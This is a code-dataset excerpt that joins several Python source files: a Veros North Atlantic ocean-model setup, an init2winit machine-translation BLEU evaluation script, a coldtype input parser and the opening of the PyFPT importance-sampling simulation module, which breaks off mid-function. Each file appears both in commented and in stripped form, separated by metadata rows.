    ice_mask = (vs.temp[:, :, -1, vs.tau] * vs.maskT[:, :, -1] <= -1.8) & (vs.forc_temp_surface <= 0.0)
    vs.forc_temp_surface = npx.where(ice_mask, 0.0, vs.forc_temp_surface)
    vs.forc_salt_surface = npx.where(ice_mask, 0.0, vs.forc_salt_surface)
    if settings.enable_tempsalt_sources:
        # Sponge layers: restore interior T/S towards t_star / s_star with
        # local rate rest_tscl.
        vs.temp_source = (
            vs.maskT
            * vs.rest_tscl
            * (f1 * vs.t_star[:, :, :, n1] + f2 * vs.t_star[:, :, :, n2] - vs.temp[:, :, :, vs.tau])
        )
        vs.salt_source = (
            vs.maskT
            * vs.rest_tscl
            * (f1 * vs.s_star[:, :, :, n1] + f2 * vs.s_star[:, :, :, n2] - vs.salt[:, :, :, vs.tau])
        )
    return KernelOutput(
        surface_taux=vs.surface_taux,
        surface_tauy=vs.surface_tauy,
        temp_source=vs.temp_source,
        salt_source=vs.salt_source,
        forc_tke_surface=vs.forc_tke_surface,
        forc_temp_surface=vs.forc_temp_surface,
        forc_salt_surface=vs.forc_salt_surface,
    )
| 38.387187 | 118 | 0.550468 |
import os
import h5netcdf
from PIL import Image
import scipy.spatial
import scipy.ndimage
from veros import VerosSetup, veros_routine, veros_kernel, KernelOutput
from veros.variables import Variable
from veros.core.operators import numpy as npx, update, at
import veros.tools
BASE_PATH = os.path.dirname(os.path.realpath(__file__))
DATA_FILES = veros.tools.get_assets("north_atlantic", os.path.join(BASE_PATH, "assets.json"))
TOPO_MASK_FILE = os.path.join(BASE_PATH, "topo_mask.png")
class NorthAtlanticSetup(VerosSetup):
x_boundary = 17.2
y_boundary = 70.0
max_depth = 5800.0
@veros_routine
def set_parameter(self, state):
settings = state.settings
settings.identifier = "na"
settings.nx, settings.ny, settings.nz = 250, 350, 50
settings.x_origin = -98.0
settings.y_origin = -18.0
settings.dt_mom = 3600.0 / 2.0
settings.dt_tracer = 3600.0 / 2.0
settings.runlen = 86400 * 365.0 * 10.0
settings.coord_degree = True
settings.enable_neutral_diffusion = True
settings.enable_skew_diffusion = True
settings.K_iso_0 = 1000.0
settings.K_iso_steep = 200.0
settings.iso_dslope = 1.0 / 1000.0
settings.iso_slopec = 4.0 / 1000.0
settings.enable_hor_friction = True
settings.A_h = 1e3
settings.enable_hor_friction_cos_scaling = True
settings.hor_friction_cosPower = 1
settings.enable_tempsalt_sources = True
settings.enable_implicit_vert_friction = True
settings.enable_tke = True
settings.c_k = 0.1
settings.c_eps = 0.7
settings.alpha_tke = 30.0
settings.mxl_min = 1e-8
settings.tke_mxl_choice = 2
settings.kappaM_min = 2e-4
settings.kappaH_min = 2e-5
settings.enable_kappaH_profile = True
settings.K_gm_0 = 1000.0
settings.enable_eke = False
settings.enable_idemix = False
settings.eq_of_state_type = 5
state.dimensions["nmonths"] = 12
state.var_meta.update(
{
"sss_clim": Variable("sss_clim", ("xt", "yt", "nmonths"), "g/kg", "Monthly sea surface salinity"),
"sst_clim": Variable("sst_clim", ("xt", "yt", "nmonths"), "deg C", "Monthly sea surface temperature"),
"sss_rest": Variable(
"sss_rest", ("xt", "yt", "nmonths"), "g/kg", "Monthly sea surface salinity restoring"
),
"sst_rest": Variable(
"sst_rest", ("xt", "yt", "nmonths"), "deg C", "Monthly sea surface temperature restoring"
),
"t_star": Variable(
"t_star", ("xt", "yt", "zt", "nmonths"), "deg C", "Temperature sponge layer forcing"
),
"s_star": Variable("s_star", ("xt", "yt", "zt", "nmonths"), "g/kg", "Salinity sponge layer forcing"),
"rest_tscl": Variable("rest_tscl", ("xt", "yt", "zt"), "1/s", "Forcing restoration time scale"),
"taux": Variable("taux", ("xt", "yt", "nmonths"), "N/s^2", "Monthly zonal wind stress"),
"tauy": Variable("tauy", ("xt", "yt", "nmonths"), "N/s^2", "Monthly meridional wind stress"),
}
)
@veros_routine
def set_grid(self, state):
vs = state.variables
settings = state.settings
vs.dxt = update(vs.dxt, at[2:-2], (self.x_boundary - settings.x_origin) / settings.nx)
vs.dyt = update(vs.dyt, at[2:-2], (self.y_boundary - settings.y_origin) / settings.ny)
vs.dzt = veros.tools.get_vinokur_grid_steps(settings.nz, self.max_depth, 10.0, refine_towards="lower")
@veros_routine
def set_coriolis(self, state):
vs = state.variables
settings = state.settings
vs.coriolis_t = update(
vs.coriolis_t, at[...], 2 * settings.omega * npx.sin(vs.yt[npx.newaxis, :] / 180.0 * settings.pi)
)
@veros_routine(dist_safe=False, local_variables=["kbot", "xt", "yt", "zt"])
def set_topography(self, state):
vs = state.variables
settings = state.settings
with h5netcdf.File(DATA_FILES["topography"], "r") as topo_file:
topo_x, topo_y, topo_bottom_depth = (self._get_data(topo_file, k) for k in ("x", "y", "z"))
topo_mask = npx.flipud(npx.asarray(Image.open(TOPO_MASK_FILE))).T
topo_bottom_depth = npx.where(topo_mask, 0, topo_bottom_depth)
topo_bottom_depth = scipy.ndimage.gaussian_filter(
topo_bottom_depth, sigma=(len(topo_x) / settings.nx, len(topo_y) / settings.ny)
)
interp_coords = npx.meshgrid(vs.xt[2:-2], vs.yt[2:-2], indexing="ij")
interp_coords = npx.rollaxis(npx.asarray(interp_coords), 0, 3)
z_interp = scipy.interpolate.interpn(
(topo_x, topo_y), topo_bottom_depth, interp_coords, method="nearest", bounds_error=False, fill_value=0
)
vs.kbot = update(
vs.kbot,
at[2:-2, 2:-2],
npx.where(
z_interp < 0.0,
1 + npx.argmin(npx.abs(z_interp[:, :, npx.newaxis] - vs.zt[npx.newaxis, npx.newaxis, :]), axis=2),
0,
),
)
vs.kbot = npx.where(vs.kbot < settings.nz, vs.kbot, 0)
def _get_data(self, f, var):
var_obj = f.variables[var]
return npx.array(var_obj).T
    @veros_routine(
        dist_safe=False,
        local_variables=[
            "tau",
            "xt",
            "yt",
            "zt",
            "temp",
            "maskT",
            "salt",
            "taux",
            "tauy",
            "sst_clim",
            "sss_clim",
            "sst_rest",
            "sss_rest",
            "t_star",
            "s_star",
            "rest_tscl",
        ],
    )
    def set_initial_conditions(self, state):
        """Load initial temperature/salinity, wind stress and restoring fields.

        Reads the forcing and restoring netCDF files and interpolates every
        field onto the model grid. Monthly climatologies are stored with a
        trailing month axis of length 12.
        """
        vs = state.variables
        with h5netcdf.File(DATA_FILES["forcing"], "r") as forcing_file:
            # Target grids: horizontal T points and the full 3D T grid.
            t_hor = (vs.xt[2:-2], vs.yt[2:-2])
            t_grid = (vs.xt[2:-2], vs.yt[2:-2], vs.zt)
            forc_coords = [self._get_data(forcing_file, k) for k in ("xt", "yt", "zt")]
            # Shift longitudes by 360 deg and flip/scale the depth axis by
            # -0.01 (presumably cm positive-down -> m negative-down; confirm
            # against the dataset convention).
            forc_coords[0] = forc_coords[0] - 360
            forc_coords[2] = -0.01 * forc_coords[2][::-1]
            # Initial temperature (depth axis reversed to match forc_coords).
            temp_raw = self._get_data(forcing_file, "temp_ic")[..., ::-1]
            temp = veros.tools.interpolate(forc_coords, temp_raw, t_grid, missing_value=-1e20)
            vs.temp = update(vs.temp, at[2:-2, 2:-2, :, vs.tau], vs.maskT[2:-2, 2:-2, :] * temp)
            # Initial salinity; the 35.0 + 1000 * (...) rescaling suggests the
            # file stores anomalies in different units — confirm with dataset.
            salt_raw = self._get_data(forcing_file, "salt_ic")[..., ::-1]
            salt = 35.0 + 1000 * veros.tools.interpolate(forc_coords, salt_raw, t_grid, missing_value=-1e20)
            vs.salt = update(vs.salt, at[2:-2, 2:-2, :, vs.tau], vs.maskT[2:-2, 2:-2, :] * salt)
            # Monthly wind stress, defined on the U grid (scaled by 1/10).
            forc_u_coords_hor = [self._get_data(forcing_file, k) for k in ("xu", "yu")]
            forc_u_coords_hor[0] = forc_u_coords_hor[0] - 360
            taux = self._get_data(forcing_file, "taux")
            tauy = self._get_data(forcing_file, "tauy")
            for k in range(12):
                vs.taux = update(
                    vs.taux,
                    at[2:-2, 2:-2, k],
                    (veros.tools.interpolate(forc_u_coords_hor, taux[..., k], t_hor, missing_value=-1e20) / 10.0),
                )
                vs.tauy = update(
                    vs.tauy,
                    at[2:-2, 2:-2, k],
                    (veros.tools.interpolate(forc_u_coords_hor, tauy[..., k], t_hor, missing_value=-1e20) / 10.0),
                )
            # Monthly SST/SSS climatologies and their restoring coefficients.
            sst_clim, sss_clim, sst_rest, sss_rest = [
                forcing_file.variables[k][...].T for k in ("sst_clim", "sss_clim", "sst_rest", "sss_rest")
            ]
            for k in range(12):
                vs.sst_clim = update(
                    vs.sst_clim,
                    at[2:-2, 2:-2, k],
                    veros.tools.interpolate(forc_coords[:-1], sst_clim[..., k], t_hor, missing_value=-1e20),
                )
                vs.sss_clim = update(
                    vs.sss_clim,
                    at[2:-2, 2:-2, k],
                    (veros.tools.interpolate(forc_coords[:-1], sss_clim[..., k], t_hor, missing_value=-1e20) * 1000 + 35),
                )
                vs.sst_rest = update(
                    vs.sst_rest,
                    at[2:-2, 2:-2, k],
                    (veros.tools.interpolate(forc_coords[:-1], sst_rest[..., k], t_hor, missing_value=-1e20) * 41868.0),
                )
                vs.sss_rest = update(
                    vs.sss_rest,
                    at[2:-2, 2:-2, k],
                    (veros.tools.interpolate(forc_coords[:-1], sss_rest[..., k], t_hor, missing_value=-1e20) / 100.0),
                )
        # Sponge-layer restoring time scale and monthly target fields.
        with h5netcdf.File(DATA_FILES["restoring"], "r") as restoring_file:
            rest_coords = [self._get_data(restoring_file, k) for k in ("xt", "yt", "zt")]
            rest_coords[0] = rest_coords[0] - 360
            vs.rest_tscl = update(
                vs.rest_tscl,
                at[2:-2, 2:-2, :],
                veros.tools.interpolate(rest_coords, self._get_data(restoring_file, "tscl")[..., 0], t_grid),
            )
            t_star = self._get_data(restoring_file, "t_star")
            s_star = self._get_data(restoring_file, "s_star")
            for k in range(12):
                vs.t_star = update(
                    vs.t_star,
                    at[2:-2, 2:-2, :, k],
                    veros.tools.interpolate(rest_coords, t_star[..., k], t_grid, missing_value=0.0),
                )
                vs.s_star = update(
                    vs.s_star,
                    at[2:-2, 2:-2, :, k],
                    veros.tools.interpolate(rest_coords, s_star[..., k], t_grid, missing_value=0.0),
                )
@veros_routine
def set_forcing(self, state):
vs = state.variables
vs.update(set_forcing_kernel(state))
@veros_routine
def set_diagnostics(self, state):
diagnostics = state.diagnostics
settings = state.settings
diagnostics["snapshot"].output_frequency = 3600.0 * 24 * 10
diagnostics["averages"].output_frequency = 3600.0 * 24 * 10
diagnostics["averages"].sampling_frequency = settings.dt_tracer
diagnostics["averages"].output_variables = [
"temp",
"salt",
"u",
"v",
"w",
"surface_taux",
"surface_tauy",
"psi",
]
diagnostics["cfl_monitor"].output_frequency = settings.dt_tracer * 10
    @veros_routine
    def after_timestep(self, state):
        # Hook invoked after every time step; intentionally a no-op here.
        pass
@veros_kernel
def set_forcing_kernel(state):
    """Interpolate the monthly forcing fields to the current model time and
    derive the surface forcings for momentum, TKE, temperature and salinity.

    Returns a ``KernelOutput`` holding the updated forcing variables.
    """
    vs = state.variables
    settings = state.settings
    # Idealized calendar: 360-day year split into 12 equal months.
    year_in_seconds = 360 * 86400.0
    # Indices (n1, n2) and weights (f1, f2) of the two monthly fields
    # bracketing the current model time.
    (n1, f1), (n2, f2) = veros.tools.get_periodic_interval(vs.time, year_in_seconds, year_in_seconds / 12.0, 12)
    # Linearly interpolated wind stress.
    vs.surface_taux = f1 * vs.taux[:, :, n1] + f2 * vs.taux[:, :, n2]
    vs.surface_tauy = f1 * vs.tauy[:, :, n1] + f2 * vs.tauy[:, :, n2]
    # TKE surface forcing ~ |tau / rho_0|^(3/2); the stress components are
    # averaged onto the T points before taking the magnitude.
    if settings.enable_tke:
        vs.forc_tke_surface = update(
            vs.forc_tke_surface,
            at[1:-1, 1:-1],
            npx.sqrt(
                (0.5 * (vs.surface_taux[1:-1, 1:-1] + vs.surface_taux[:-2, 1:-1]) / settings.rho_0) ** 2
                + (0.5 * (vs.surface_tauy[1:-1, 1:-1] + vs.surface_tauy[1:-1, :-2]) / settings.rho_0) ** 2
            )
            ** 1.5,
        )
    # Heat capacity used to convert the SST restoring flux to a temperature
    # tendency (value consistent with seawater, J/(kg K)).
    cp_0 = 3991.86795711963
    # Restoring of surface temperature towards the monthly SST climatology.
    vs.forc_temp_surface = (
        (f1 * vs.sst_rest[:, :, n1] + f2 * vs.sst_rest[:, :, n2])
        * (f1 * vs.sst_clim[:, :, n1] + f2 * vs.sst_clim[:, :, n2] - vs.temp[:, :, -1, vs.tau])
        * vs.maskT[:, :, -1]
        / cp_0
        / settings.rho_0
    )
    # Restoring of surface salinity towards the monthly SSS climatology.
    vs.forc_salt_surface = (
        (f1 * vs.sss_rest[:, :, n1] + f2 * vs.sss_rest[:, :, n2])
        * (f1 * vs.sss_clim[:, :, n1] + f2 * vs.sss_clim[:, :, n2] - vs.salt[:, :, -1, vs.tau])
        * vs.maskT[:, :, -1]
    )
    # Suppress surface fluxes where sea ice would form: SST at or below
    # -1.8 C while the heat flux is still cooling.
    ice_mask = (vs.temp[:, :, -1, vs.tau] * vs.maskT[:, :, -1] <= -1.8) & (vs.forc_temp_surface <= 0.0)
    vs.forc_temp_surface = npx.where(ice_mask, 0.0, vs.forc_temp_surface)
    vs.forc_salt_surface = npx.where(ice_mask, 0.0, vs.forc_salt_surface)
    # Interior sponge-layer sources relaxing towards t_star / s_star.
    if settings.enable_tempsalt_sources:
        vs.temp_source = (
            vs.maskT
            * vs.rest_tscl
            * (f1 * vs.t_star[:, :, :, n1] + f2 * vs.t_star[:, :, :, n2] - vs.temp[:, :, :, vs.tau])
        )
        vs.salt_source = (
            vs.maskT
            * vs.rest_tscl
            * (f1 * vs.s_star[:, :, :, n1] + f2 * vs.s_star[:, :, :, n2] - vs.salt[:, :, :, vs.tau])
        )
    # Note: temp_source / salt_source are returned unchanged when
    # enable_tempsalt_sources is off.
    return KernelOutput(
        surface_taux=vs.surface_taux,
        surface_tauy=vs.surface_tauy,
        temp_source=vs.temp_source,
        salt_source=vs.salt_source,
        forc_tke_surface=vs.forc_tke_surface,
        forc_temp_surface=vs.forc_temp_surface,
        forc_salt_surface=vs.forc_salt_surface,
    )
| true | true |
f7230dd63cf79e81165f8294c83a6dba0d2b76c3 | 4,380 | py | Python | init2winit/mt_eval/main.py | google/init2winit | 62ec9fd31bd7b38bb7c220f15d4187bf0706506d | [
"Apache-2.0"
] | 32 | 2021-05-15T01:03:44.000Z | 2022-03-31T10:54:48.000Z | init2winit/mt_eval/main.py | google/init2winit | 62ec9fd31bd7b38bb7c220f15d4187bf0706506d | [
"Apache-2.0"
] | 31 | 2021-05-20T08:03:40.000Z | 2022-03-31T10:27:42.000Z | init2winit/mt_eval/main.py | google/init2winit | 62ec9fd31bd7b38bb7c220f15d4187bf0706506d | [
"Apache-2.0"
] | 6 | 2021-05-20T06:10:04.000Z | 2022-03-31T18:55:04.000Z | # coding=utf-8
# Copyright 2021 The init2winit Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Used to evaluate MT model (BLEU/cross_entropy_loss/log_perplexity).
"""
import json
import os
import sys
from absl import app
from absl import flags
from absl import logging
from init2winit import hyperparameters
from init2winit.dataset_lib import datasets
from init2winit.model_lib import models
from init2winit.mt_eval import bleu_evaluator
import jax
import tensorflow.compat.v2 as tf
# Enable flax xprof trace labelling.
os.environ['FLAX_PROFILE'] = 'true'
# Command-line flags. Note several help strings are built from adjacent
# string literals; a separating space is required at each join point (the
# previous text rendered as "(notneeded" and misspelled "filenmae").
flags.DEFINE_string('checkpoint_dir', '', 'Path to the checkpoint to evaluate.')
flags.DEFINE_integer('seed', 0, 'seed used to initialize the computation.')
flags.DEFINE_integer('worker_id', 1,
                     'Client id for hparam sweeps and tuning studies.')
flags.DEFINE_string('experiment_config_filename', None,
                    'Path to the config.json file for this experiment.')
flags.DEFINE_string(
    'model', '', 'Name of the model used to evaluate (not '
    'needed if experiment_config_filename is provided).')
flags.DEFINE_string(
    'dataset', '', 'Name of the dataset used to evaluate (not '
    'needed if experiment_config_filename is provided).')
flags.DEFINE_string(
    'hparam_overrides', '', 'json representation of a flattened dict of hparam '
    'overrides. For nested dictionaries, the override key '
    'should be specified as lr_hparams.initial_value.')
flags.DEFINE_string(
    'trial_hparams_filename', None,
    'Path to the hparams.json file for the trial we want to run inference on.')
flags.DEFINE_string('mt_eval_config', '',
                    'Json representation of the mt evaluation config.')
FLAGS = flags.FLAGS
def main(unused_argv):
  """Runs BLEU / perplexity evaluation on a trained MT model checkpoint."""
  # Necessary to use the tfds loader.
  tf.enable_v2_behavior()
  if jax.process_count() > 1:
    # TODO(ankugarg): Add support for multihost inference.
    raise NotImplementedError('BLEU eval does not support multihost inference.')
  rng = jax.random.PRNGKey(FLAGS.seed)
  mt_eval_config = json.loads(FLAGS.mt_eval_config)

  if FLAGS.experiment_config_filename:
    with tf.io.gfile.GFile(FLAGS.experiment_config_filename) as f:
      experiment_config = json.load(f)
    if jax.process_index() == 0:
      logging.info('experiment_config: %r', experiment_config)
    dataset_name = experiment_config['dataset']
    model_name = experiment_config['model']
    initializer_name = experiment_config['initializer']
  else:
    assert FLAGS.dataset and FLAGS.model
    dataset_name = FLAGS.dataset
    model_name = FLAGS.model
    # Bug fix: previously `experiment_config['initializer']` was referenced
    # below even when no experiment config was given, raising a NameError.
    # Fall back to the framework default initializer.
    # NOTE(review): 'noop' assumed to be the init2winit default — confirm.
    initializer_name = 'noop'

  if jax.process_index() == 0:
    logging.info('argv:\n%s', ' '.join(sys.argv))
    logging.info('device_count: %d', jax.device_count())
    # Use the non-deprecated process_* API, consistent with the checks above.
    logging.info('num_hosts : %d', jax.process_count())
    logging.info('host_id : %d', jax.process_index())

  model_class = models.get_model(model_name)
  dataset_builder = datasets.get_dataset(dataset_name)
  dataset_meta_data = datasets.get_dataset_meta_data(dataset_name)

  hparam_overrides = None
  if FLAGS.hparam_overrides:
    if isinstance(FLAGS.hparam_overrides, str):
      hparam_overrides = json.loads(FLAGS.hparam_overrides)

  merged_hps = hyperparameters.build_hparams(
      model_name=model_name,
      initializer_name=initializer_name,
      dataset_name=dataset_name,
      hparam_file=FLAGS.trial_hparams_filename,
      hparam_overrides=hparam_overrides)
  if jax.process_index() == 0:
    logging.info('Merged hps are: %s', json.dumps(merged_hps.to_json()))

  evaluator = bleu_evaluator.BLEUEvaluator(FLAGS.checkpoint_dir, merged_hps,
                                           rng,
                                           model_class, dataset_builder,
                                           dataset_meta_data,
                                           mt_eval_config)
  evaluator.translate_and_calculate_bleu()


if __name__ == '__main__':
  app.run(main)
| 35.322581 | 80 | 0.712557 |
import json
import os
import sys
from absl import app
from absl import flags
from absl import logging
from init2winit import hyperparameters
from init2winit.dataset_lib import datasets
from init2winit.model_lib import models
from init2winit.mt_eval import bleu_evaluator
import jax
import tensorflow.compat.v2 as tf
os.environ['FLAX_PROFILE'] = 'true'
flags.DEFINE_string('checkpoint_dir', '', 'Path to the checkpoint to evaluate.')
flags.DEFINE_integer('seed', 0, 'seed used to initialize the computation.')
flags.DEFINE_integer('worker_id', 1,
'Client id for hparam sweeps and tuning studies.')
flags.DEFINE_string('experiment_config_filename', None,
'Path to the config.json file for this experiment.')
flags.DEFINE_string(
'model', '', 'Name of the model used to evaluate (not'
'needed if experiment_config_filenmae is provided).')
flags.DEFINE_string(
'dataset', '', 'Name of the dataset used to evaluate (not'
'needed if experiment_config_filenmae is provided).')
flags.DEFINE_string(
'hparam_overrides', '', 'json representation of a flattened dict of hparam '
'overrides. For nested dictionaries, the override key '
'should be specified as lr_hparams.initial_value.')
flags.DEFINE_string(
'trial_hparams_filename', None,
'Path to the hparams.json file for the trial we want to run inference on.')
flags.DEFINE_string('mt_eval_config', '',
'Json representation of the mt evaluation config.')
FLAGS = flags.FLAGS
def main(unused_argv):
tf.enable_v2_behavior()
if jax.process_count() > 1:
raise NotImplementedError('BLEU eval does not support multihost inference.')
rng = jax.random.PRNGKey(FLAGS.seed)
mt_eval_config = json.loads(FLAGS.mt_eval_config)
if FLAGS.experiment_config_filename:
with tf.io.gfile.GFile(FLAGS.experiment_config_filename) as f:
experiment_config = json.load(f)
if jax.process_index() == 0:
logging.info('experiment_config: %r', experiment_config)
dataset_name = experiment_config['dataset']
model_name = experiment_config['model']
else:
assert FLAGS.dataset and FLAGS.model
dataset_name = FLAGS.dataset
model_name = FLAGS.model
if jax.process_index() == 0:
logging.info('argv:\n%s', ' '.join(sys.argv))
logging.info('device_count: %d', jax.device_count())
logging.info('num_hosts : %d', jax.host_count())
logging.info('host_id : %d', jax.host_id())
model_class = models.get_model(model_name)
dataset_builder = datasets.get_dataset(dataset_name)
dataset_meta_data = datasets.get_dataset_meta_data(dataset_name)
hparam_overrides = None
if FLAGS.hparam_overrides:
if isinstance(FLAGS.hparam_overrides, str):
hparam_overrides = json.loads(FLAGS.hparam_overrides)
merged_hps = hyperparameters.build_hparams(
model_name=model_name,
initializer_name=experiment_config['initializer'],
dataset_name=dataset_name,
hparam_file=FLAGS.trial_hparams_filename,
hparam_overrides=hparam_overrides)
if jax.process_index() == 0:
logging.info('Merged hps are: %s', json.dumps(merged_hps.to_json()))
evaluator = bleu_evaluator.BLEUEvaluator(FLAGS.checkpoint_dir, merged_hps,
rng,
model_class, dataset_builder,
dataset_meta_data,
mt_eval_config)
evaluator.translate_and_calculate_bleu()
if __name__ == '__main__':
app.run(main)
| true | true |
f7230ef54d1dddee1a53f3db76cced7857db9283 | 1,316 | py | Python | coldtype/tool.py | goodhertz/coldtype | 2460b66abb28e9532f9e2b55167ae565f95366e7 | [
"Apache-2.0"
] | 142 | 2020-06-12T17:01:58.000Z | 2022-03-16T23:21:37.000Z | coldtype/tool.py | goodhertz/coldtype | 2460b66abb28e9532f9e2b55167ae565f95366e7 | [
"Apache-2.0"
] | 35 | 2020-04-15T15:34:54.000Z | 2022-03-19T20:26:47.000Z | coldtype/tool.py | goodhertz/coldtype | 2460b66abb28e9532f9e2b55167ae565f95366e7 | [
"Apache-2.0"
] | 14 | 2020-06-23T18:56:46.000Z | 2022-03-31T15:54:56.000Z | from coldtype.geometry.rect import Rect
def parse_inputs(inputs, defaults):
    """Merge user-supplied inputs with per-key defaults.

    Args:
        inputs: either a dict of overrides, or an iterable of ``"key=value"``
            strings (e.g. CLI arguments).
        defaults: dict mapping key -> ``[default_value, caster]`` or
            ``[default_value, caster, error_message]``, where ``caster``
            converts a string override to its final value and the optional
            third element marks the key as required. The special keys
            ``"w"``/``"h"`` may map to a bare default value.

    Returns:
        dict of fully-resolved values.

    Raises:
        ValueError: if a key with an error message (third element) is not
            provided in ``inputs``.
    """
    defaults["rect"] = [
        Rect(1080, 1080),
        lambda xs: Rect([int(x) for x in xs.split(",")])]
    defaults["preview_only"] = [False, bool]
    defaults["log"] = [False, bool]

    parsed = {}
    if not isinstance(inputs, dict):
        for arg in inputs:
            # Split on the first "=" only, so values may contain "=" (the
            # previous unbounded split raised ValueError for such inputs).
            k, v = arg.split("=", 1)
            parsed[k] = v
    else:
        parsed = {**inputs}

    out = {}
    for k, v in defaults.items():
        if k in ["w", "h"]:
            # "w"/"h" defaults are stored as bare values; normalize the
            # defaults entry to the [value, caster] form.
            out[k] = v
            defaults[k] = [v, int]
        else:
            out[k] = v[0]
            if k not in parsed and len(v) > 2:
                # A third element marks this key as required.
                raise ValueError(v[2])

    for k, v in parsed.items():
        if k not in defaults:
            print(f"> key {k} not recognized")
            continue
        if defaults[k][0] is None and v is None:
            # Explicit None override of a None default: keep the default.
            continue
        if isinstance(v, str):
            if defaults[k][1] == bool:
                # NOTE(review): eval() on user input is unsafe for untrusted
                # sources; kept for compatibility with existing call sites.
                out[k] = bool(eval(v))
            else:
                out[k] = defaults[k][1](v)
        elif k == "rect":
            out[k] = Rect(v)
        else:
            out[k] = v
    return out
def parse_inputs(inputs, defaults):
defaults["rect"] = [
Rect(1080, 1080),
lambda xs: Rect([int(x) for x in xs.split(",")])]
defaults["preview_only"] = [False, bool]
defaults["log"] = [False, bool]
parsed = {}
if not isinstance(inputs, dict):
for input in inputs:
k, v = input.split("=")
parsed[k] = v
else:
parsed = {**inputs}
out = {}
for k, v in defaults.items():
if k in ["w", "h"]:
out[k] = v
defaults[k] = [v, int]
else:
out[k] = v[0]
if k not in parsed and len(v) > 2:
raise Exception(v[2])
for k, v in parsed.items():
if k in defaults:
if defaults[k][0] is None and v is None:
pass
else:
if isinstance(v, str):
if defaults[k][1] == bool:
out[k] = bool(eval(v))
else:
out[k] = defaults[k][1](v)
else:
if k == "rect":
out[k] = Rect(v)
else:
out[k] = v
else:
print(f"> key {k} not recognized")
return out | true | true |
f7230f80da0d79443d06cfb13653f105a7f36777 | 9,565 | py | Python | pyfpt/numerics/is_simulation.py | Jacks0nJ/Importance-Sampling-Code | f41fac451e9f78ab2130600ca83e1a6406ee43a5 | [
"Apache-2.0"
] | null | null | null | pyfpt/numerics/is_simulation.py | Jacks0nJ/Importance-Sampling-Code | f41fac451e9f78ab2130600ca83e1a6406ee43a5 | [
"Apache-2.0"
] | null | null | null | pyfpt/numerics/is_simulation.py | Jacks0nJ/Importance-Sampling-Code | f41fac451e9f78ab2130600ca83e1a6406ee43a5 | [
"Apache-2.0"
] | null | null | null | '''
Importance Sampling Simulation
------------------------------
This is the main module of the PyFPT code, as it runs the simulations, post
processes and exports the data ready for plotting.
'''
from timeit import default_timer as timer
import multiprocessing as mp
from multiprocessing import Process, Queue
import numpy as np
from .multi_processing_error import multi_processing_error
from .histogram_data_truncation import histogram_data_truncation
from .save_data_to_file import save_data_to_file
from .data_points_pdf import data_points_pdf
from .importance_sampling_cython import\
importance_sampling_simulations
def is_simulation(drift, diffusion, x_in, x_end,
num_runs, bias, time_step, bins=50, min_bin_size=400,
num_sub_samples=20, estimator='lognormal',
save_data=False, t_in=0., t_f=100, x_r=None):
"""Executes the simulation runs, then returns the histogram bin centres,
heights and errors.
Parameters
----------
drift : function
The drift term of the simulated Langevin equation. Must take both x and
t as arguments in the format ``(x, t)``.
diffusion : function
The diffusion term of the simulated Langevin equation. Must take both
x and t as arguments in the format ``(x, t)``.
x_in : float
The initial position value.
x_end : float
The end position value, i.e. the threshold which defines the FPT
problem.
num_runs : int
The number of simulation runs.
bias : scalar or function
The bias used in the simulated Langevin equation to achieve importance
sampling
If a scalar (float or int), this the bias amplitude, i.e. a coefficent
which mutiplies the the diffusion to define the bias.
If a function, this simply defines the bias used. Must take arguments
for both position and time in the format ``(x, t)``.
bins : int or sequence, optional
If bins is an integer, it defines the number equal width bins for the
first-passage times. If bins is a list or numpy array, it defines the
bin edges, including the left edge of the first bin and the right edge
of the last bin. The widths can vary. Defaults to 50 evenly spaced
bins.
time_step : float or int, optional
The time step. This should be at least smaller than the standard
deviation of the FPTs.
min_bin_size : int, optional
The minimum number of runs per bin to included in the data analysis.
If a bin has less than this number, it is truncated. Defaults to 400.
estimator : string, optional
The estimator used to reconstruct the target distribution probability
density from the importance sample. If ``'lognormal'``, it assumes the
weights in each bin follow a lognomral distribution. If ``'naive'``, no
assumption is made but more runs are required for convergance.
num_sub_samples : int, optional
The number of subsamples used in jackknife estimation of the errors
used for the ``'naive'`` estimator. Defaults to 20 when ``estimator``
is ``'naive'``.
Save_data : bool, optional
If ``True``, the first-passage times and the associated weights for
each run is saved to a file.
t_in : float, optional
The initial time value of simulation Defaults to 0.
t_f : float, optional
The maxiumum FPT allowed per run. If this is exceded, the
simulation run ends and returns ``t_f``, which can then be
truncated. Defaults to 100.
x_r : float, optional
The value of the reflective boundary. Must be compatible with the x_in
and x_end chosen. Defaults to unreachable value, effectively no
boundary.
Returns
-------
bin_centres : list
The centres of the histogram bins.
heights : list
The heights of the normalised histogram bars.
errors : list
The errors in estimating the heights.
"""
# Checking drift and diffusion are of the correct format
if callable(drift) is True:
if isinstance(drift(x_in, t_in), float) is True:
pass
else:
ValueError('Provided drift is not the format (x, t)')
else:
ValueError('Provided drift is not a function')
if callable(diffusion) is True:
if isinstance(diffusion(x_in, t_in), float) is True:
pass
else:
ValueError('Provided diffusion is not the format (x, t)')
else:
ValueError('Provided diffusion is not a function')
# Make sure provided values are floats for Cython
if isinstance(x_in, int) is True:
x_in = 1.0*x_in
if isinstance(x_end, int) is True:
x_end = 1.0*x_end
# Checking bias is of correct form
if isinstance(bias, float) is True or isinstance(bias, float) is True:
# If the bias argument is a scalar, use diffusion based bias
bias_type = 'diffusion'
if bias == 0:
estimator = 'naive'
print('As direct simulation, defaulting to naive estimator')
elif callable(bias):
# If a function is provided, check it is of the correct form
if isinstance(bias(x_in, t_in), float) is True:
bias_type = 'custom'
else:
ValueError('bias function must be of the form bias(x, t)')
else:
ValueError('Provided bias is not a number or function')
if isinstance(time_step, float) is not True\
and isinstance(time_step, int) is not True:
raise ValueError('time_step is not a number')
# Check the user has provided a estimator
if estimator != 'lognormal' and estimator != 'naive':
print('Invalid estimator argument, defaulting to naive method')
estimator = 'naive'
# If no x_r argument is provided, default to infinite boundary
if x_r is None:
# Set the reflective surface at an arbitrarily large value in the
# opposite direction to propagation
x_r = 10000*(x_in-x_end)
elif isinstance(x_r, float) is False:
if isinstance(x_r, int) is True:
if isinstance(x_r, bool) is True:
raise ValueError('x_r is not a number')
else:
pass
else:
raise ValueError('x_r is not a number')
elif (x_r-x_in)*(x_in-x_end) < 0:
raise ValueError('End and relfective surfaces not compatible with' +
' initial value.')
# The number of sims per core, so the total is correct
